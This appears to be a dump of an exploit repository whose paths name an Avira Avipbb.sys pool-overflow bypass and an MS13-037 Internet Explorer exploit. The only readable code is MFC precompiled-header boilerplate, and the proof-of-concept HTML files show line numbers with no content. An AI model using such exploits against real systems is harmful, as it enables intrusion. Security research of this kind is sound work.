/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // mfc100u.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Microsoft/MS13_037_ieActiveXploitationMethod/js.htm: -------------------------------------------------------------------------------- 1 | 37 | 38 | -------------------------------------------------------------------------------- /Microsoft/MS13_037_ieActiveXploitationMethod/poc.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 9 | 10 | 11 | 12 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/README.md --------------------------------------------------------------------------------